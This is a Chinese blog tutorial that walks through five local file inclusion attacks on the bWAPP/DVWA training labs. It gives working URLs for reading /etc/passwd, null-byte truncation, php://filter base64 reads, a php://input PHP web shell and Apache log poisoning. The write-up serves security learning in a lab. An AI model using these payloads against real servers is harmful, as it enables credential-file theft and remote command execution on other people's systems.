5种文件包含漏洞利用方法

准备环境

本次使用bWAPP和DVWA作为测试系统,填写 bee/bug 登录系统

no.1.png

选择"本地文件包含" and then hack it
no.2.png
no.3.png

0x1基本的文件包含

http://192.168.66.133/bWAPP/rlfi.php?language=lang_en.php&action=go
http://192.168.66.133/bWAPP/rlfi.php?language=/etc/passwd&action=go

no.4.png

0x2空字节截断

提升系统安全等级,再进行测试,上述方法就会失效

n5.png

采用%00进行截断包含
http://192.168.66.133/bWAPP/rlfi.php?language=/etc/passwd%00&action=go

n6.png

0x3Base64编码

利用php://filter和base64对获取的内容进行编码显示

http://192.168.66.133/bWAPP/rlfi.php?language=**php://filter/read=convert.base64-encode/resource=**/etc/passwd%00

n7.png

对获取到的数据再进行base64解码即可
n8.png

0x4PHP输入流

利用php://input读取没有处理过的POST数据,POST内容为一句话木马

http://192.168.66.133/bWAPP/rlfi.php?language=**php://input&cmd=id**

POST:<?php system($_GET['cmd']); ?>

n9.png

0x5日志包含

apache会通过日志文件记录用户的连接信息,这些信息包括ip地址、访问时间、请求类型、状态码等信息。这样我们通过访问指定的url将一句话写入到日志文件中,然后通过文件包含漏洞包含Apache日志文件。注意:要使用burp提交数据,绕过前端浏览器url编码

http://192.168.66.133/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id

n10.png
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值